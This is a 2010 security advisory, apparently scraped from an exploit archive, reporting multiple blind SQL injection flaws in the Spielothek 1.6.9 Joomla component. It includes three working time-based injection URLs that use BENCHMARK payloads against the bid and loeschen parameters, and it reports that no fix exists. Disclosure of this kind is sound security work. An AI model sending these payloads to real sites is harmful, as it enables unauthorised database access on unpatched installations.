扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
Spielothek 1.6.9 Joomla Component Multiple Blind SQL Injection NameSpielothek Vendorhttp://www.spielban.de Versions Affected 1.6.9 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-07-31 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION ________________________ Thiscomponentallowsyoutopresentyourusers a highscore-enabled game-area.It is based on the all known joomlaflashgames, but with more features and with better scoring method. Youcan create own categories for games andletyoursite-visitorshave fun,sotheywill return. II. DESCRIPTION _______________ Some parametersare not properly sanitised before being used in SQL queries. III. ANALYSIS _____________ Summary: A) Multiple Blind SQL Injection A) Multiple Blind SQL Injection _______________________________ Manyparametersinvariousfiles such as battle.php, scores.phpetc. are not properly sanitised before being used in SQL queries.Becauseof the number of flaws, I can't report the entire vulnerable code;butI can say thatmostof the numeric fields have not been properly checked. IV. SAMPLE CODE _______________ A) Multiple Blind SQL Injection http://site/path/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) V. FIX ______ No fix. |
体验盒子
